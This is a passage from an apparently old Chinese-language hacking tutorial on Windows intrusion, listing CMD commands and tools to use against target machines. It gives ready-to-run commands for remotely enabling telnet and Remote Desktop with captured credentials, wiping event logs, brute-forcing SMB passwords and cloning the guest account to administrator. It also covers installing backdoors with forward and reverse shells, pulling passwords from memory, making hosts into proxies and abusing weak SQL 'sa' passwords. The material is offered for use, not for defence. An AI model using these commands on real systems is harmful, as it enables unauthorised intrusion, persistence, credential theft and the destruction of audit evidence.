需要+端口即:telnet ip 就好)
11、传输文件命令_ftp
其实这个我个人觉得用途不大,毕竟当你拿到了FTP密码之后你可以用flashftp或者cutftp有一个图形截面的交互如何不好呢?
首先在CMD里面输入ftp
然后输入:open ip port
例如:open 192.168.1.1 123 \\连接登陆192.168.1.1的123端口
如何开启windows系统自带的ftp服务:
net start msftppsvc
12、 查看文件夹的属性_cacls
Cacls ylinuxs \\查看ylinuxs这个文件夹的属性
参数说明:F:(完全控制)R:(只读)C:(允许更改)W:(允许写入)N:(没有任何权限) 13、删除文件_deldel是用来删除文件命令
首先进入你想删除的文件的目录
del ylinuxs.txt \\删除ylinuxs.txt这个个文件
del ylinuxs.txt /f \\强制删除ylinuxs.txt这个个文件(当该文件无{MOD}常删除的时候使用该命令)
14、 finger命令
Finger是一个信息刺探命令一般在对方开启了79端口时命令使用
Finger –l user @computer
参数详解: -l 用长列表格式显示消息
User:指定用户的信息
成功实现的条件:对方必须安装tcp/ip协议
15、文件写入命令_echo:
Echo hello > index.htm \\用hello来覆盖index.htm的内容
Echo hello >>index.htm \\将hello添加到index.htm
16、写入注册表文件_regedit
Regedit /s filename.reg \\s是写入参数
17、端口映射_chgport
Chgport 3=5 \\将端口3映射到5
Chgport /d* \\删除所有端口映射
18、文件映射_subst
subst b: c:\windows \\这个时候当你访问硬盘b的时候你就是访问了 c:\windows目录了,不过这样是非常危险的
subst b: /D \\删除映射的盘b
19、查看当前正在使用的帐号:
query session \\查看帐号
20、踢掉指定用:
logoff id \\注意ID,是在用query session查看到的用户的id而不是用户名。
21发送消息给某用户或者内网主机
net send hostname or /ip message
例如:net send ylinuxs or /192.168.1.1 hello! \\给主机名为ylinuxs或是ip为192.168.1.1发送消息为hello!
CMD的内部基本入侵命令讲解完毕,现在我们来讲讲他的外部命令,也就是借用外部DOS小工具的方法:
(二)CMD外部一部分小工具的使用方法:
1、opentelnet:一个在得到对方用户名与密码的情况下远程开启对方telnet的程序
命令语法:opentelnet \\ip username pass ntml port
例 子:opentelnet \\192.168.1.1 administrator 123456 1 3800
开启主机192.168.1.1的telnet服务,并且端口设置在3800(当连接的时候就需要telnet 192.168.1.1 3800了)1是NTML的验证值,就是说,我们需要
输入登陆用户名与密码才能登陆。
该命令成功实现的条件:对方没有装防火墙,并且ipC$服务开启
telnet.vbe:一个不基于ipC$是否开启直接开telnet的工具
命令语法:cscript telnet.vbe 192.168.1.1 username pass ntml port
这个与上面哪个opentelnet的使用含义是一样的
该命令成功实现的条件:对方没有装防火墙
2、Pslist:查看系统进程的工具或是windows内部自带的tasklist命令
Pskill:杀除系统进程的工具或是windows内部自带的taskkill命令
进入工具目录直接输入:pslist即可以查看系统进程如下图:
杀死或叫结束进程
Pskill pid 进程号
taskkill /PID 进程号 \\若结束不了,可加上/F强行结束
3、fport:一个查看系统程序所对应的端口的工具或windows自带的netstat 或加上-an参数
4、远程删除日志:
Cleanlog.vbe
命令语法:
Cscript cleanlog.vbe ip username pass system –all \\删除系统日志
Cscript cleanlog.vbe ip username pass application –all \\删除应用程序日志
Cscript cleanlog.vbe ip username pass secutity –all \\删除安全日志
使用的优势:无须对方开启ipc$共享
5、远程开启关闭重启主机:
Reboot.vbe
Cscript Reboot.vbe ip username pass –r \\重启目标主机
Cscript Reboot.vbe ip username pass –s \\关闭目标主机
Cscript Reboot.vbe ip username pass –I \\注销目标当前用户
Cscript Reboot.vbe ip username pass –p \\关闭目标电源
使用的优势:无须对方开启ipc$共享
6、端口重定rinetd and fpipe
首先说说rinetd的使用
首先我们配置一个文件ylinuxs.txt这样配置一般都很简单,一般下载下来的软件里面都有说明的,只须按照它所说的步骤一步步来就可以了。
ylinuxs.txt内容如下:
ip1 21 ip2 3389 //释:ip1是主机ip ip2是要接受的内网主机ip,既整个命令的意思是当你连接ip1主机(公网ip)的21端口的时候,主机一(ip1
)会把他21端口接收到数据发到内网主机(ip2)的3389。也就是你连接ip1主机的21端口,实际上就是连接ip2的3389端口。
命令:rinetd.exe –c ylinuxs.txt
工具2:fpipe
使用命令:fpipe –v –l 53 s 53 –r 23 主机ip
例子:fpipe –l 80 –s 90 –r 80 127.0.0.1
释:将本机的80端口接收到的数据通过本机的90端口直接转发到127.0.0.1的80端口
7、SNMP弱口令的利用:
工具:Snmputil
Snmputil [get|getnext|walk]agent id \\语法格式
Snmputil walk 192.168.1.1 ylinuxs.1.3.6.1.4.1.77.1.2.25.1.5 \\查询帐户
Snmputil walk 对方ip public.1.3.6.1.2.1.25.4.2.1.2 \\查询系统进程
Snmputil walk 对方ip public.1.3.6.1.4.1.77.1.2.25.1.1 \\查询用户列表
Snmputil walk 对方ip public .1.3.6.1.2.1.1 \\列出对方系统信息
该工具的作用:查询一部分系统而已
我个人这个没有很大的作用,查看到了系统信息,要攻破还是需要运气
8、暴力破解系统密码
Smbcrack
Smbcrack ip username 字典路径 端口
说明:首先你需要用字典自己做一个字典,用户名建议是administrator 因为这个是系统默认的管理员估计大多数人的主机这个帐号还是存在的,端
口可以是139、137、445等系统开启的netBOIS协议端口就可以!
9、小巧的嗅叹器_xsniff(若有需要还可以用sniffer,对于sniffer全是英文的,没有一个月,一般人拿来用处不大,若你精通了,那可就厉害了,若想
下载或是想学习去http://hi.baidu.com/ylinuxs/blog/item/2202cb408ef79c1c9313c634.html,上面有说明文件.)
Xsniff是一个小巧的嗅叹器,可以嗅叹UDP/TCP协议的信息
使用语法:
Xsniff –pass –hide –log c:\pass.log –pass
c:\pass.log 是保存记录文件,建议选择一个深的目录,可以自定义
性能参数:
-hide 隐藏在后台运行 -log:生成嗅叹的日志文档
Pass.log:嗅叹的日志文档文档名,可以自定义
-TCP:捕获TCP数据包
-UDP:捕获UDP数据包
-ICMP:捕获ICMP数据包
-HOST:主机名或ip地址
-PORT:指定端口嗅叹
-ASC输出出时保存为ASCII格式
10、SFIND 命令行扫描器
例子:
Sfind –p 3389 192.168.1.1 192.168.1.255
扫描192.168.1.1段的1-255主机的3389端口
Sfind –cgi 192.168.1.1 //扫描192.168.1.1的cgi漏洞
Sfind –ftp 192.168.1.1 //扫描192.168.1.1的ftp漏洞
Sfind –idq 192.168.1.1 //扫描192.168.1.1的idg漏洞
11、克隆帐号CA:
CA.EXE \\ip administrator “” guest 123
将GUEST帐号克隆成管理员
Administrator 的密码为空用”” guest的密码是123
12、后门使用:
这里我介绍小榕的bits
说明:BITS必须放在system32目录下才可以安装
安装命令:rundll32.exe BITS.dll install rasato ylinuxs \\指定后门特征为ylinuxs
连接激活:
正向连接(用nc连接即可):ylinuxs:@ip[xell]:99
反向连接:ylinuxs:@ip[rxell]:yourip:port
卸载:rundll32.exe BITS.dll uninstall
同时也介绍T-CMD
安装命令:
t-cmd –install
然后:telnet ip 20540
就可以了,T-CMD是菜鸟的好选择
13、系统密码查看_showpass
直接进入showpass的目录直接运行showpass只要当前用户在线,那么showpass就可以把他的密码从内存里找出来。
14、代理肉鸡的制作_SK
安装命令:
sk.exe –install \\安装SK
sk.exe -config port 4999 \\设置端口为4999
sk.exe -config starttype 2 \\设置启动项为自启动
net start skserver \\启动SK代理服务
15、SQL弱口令利用
我本来在这里不想说这个,但是希望大家能够综合利用所以我就直接说了。(SQL的弱口令大家可以用WINDOWS 2000自动攻击探测器扫描.)
Sqlexeca.exe ip sa 123
因为是弱口令,所以用123表示,同时也告诉大家SQL服务器的最高权限帐户是SA,这个是不能更改的!
16、终端服务的开启与使用
这个恐怕就是菜鸟们最喜欢的话题了一个图形话的交互界面
工具:3389.exe 3389.vbe 3389.bat
方法一:3389.exe:只需要把此文件复制到你所要开启的服务器运行此程序就可以了。
方法二:3389.vbe:这个是一个脚本文件,使用方法如下:
Cscript 3389.vbe ip username pass port /r //密码必须是管理员密码 port是终端的端口,这个是可以自己定义的,参数.r是说
明开启成功自动重启动服务器!你也可以使用/fr,FR的意思就是强制重新启动服务器!
方法三:3389.bat:这个是一个BAT文件利用批处理来开3389网络上很多相关资料大家可以参考参考,3389.bat的内容如下:
echo [components] > d:\ylinuxs
echo tsenable=on >> d:\ylinuxs
sysocmgr /i:d:\winnt\inf\sysoc.inf /u:d:\ylinuxs /q
大家可以把上述代码保存一个bat然后放到要开3389的服务器上,在CMD下运行,服务器的3389就开启了。
终端的连接:
这里推荐使用2003或者XP的终端登陆器,然后系统会提示你输入帐号与密码,输入以后直接登陆就可以了!
9 7 3 1 2 4 8 :
本文来源:不详 作者:佚名